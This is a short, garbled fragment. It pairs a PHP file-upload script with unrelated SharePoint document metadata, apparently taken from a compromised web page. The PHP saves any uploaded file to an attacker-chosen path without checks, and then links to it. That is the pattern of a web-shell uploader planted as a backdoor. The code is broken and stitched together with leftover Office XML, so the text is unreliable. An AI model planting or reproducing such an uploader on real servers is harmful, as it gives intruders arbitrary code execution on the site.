$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<a href='$fullpath'>OK-Click here!</a>
";
}
Upload files...}echo '<title>Upload files...</title>';
<html xmlns:mso="urn:schemas-microsoft-com:office:office" xmlns:msdt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882">
<!--[if gte mso 9]><xml><mso:CustomDocumentProperties>
<mso:vti_imgdate msdt:dt="string"></mso:vti_imgdate>
<mso:Keywords msdt:dt="string"></mso:Keywords>
<mso:Order msdt:dt="string">3100.00000000000</mso:Order>
<mso:AlternateThumbnailUrl msdt:dt="string"></mso:AlternateThumbnailUrl>
<mso:ContentTypeId msdt:dt="string">0x010102006EA715F55A38B349B08CAF004792D35F</mso:ContentTypeId>
<mso:_SourceUrl msdt:dt="string"></mso:_SourceUrl>
<mso:_SharedFileIndex msdt:dt="string"></mso:_SharedFileIndex>
</mso:CustomDocumentProperties></xml><![endif]-->
<title></title>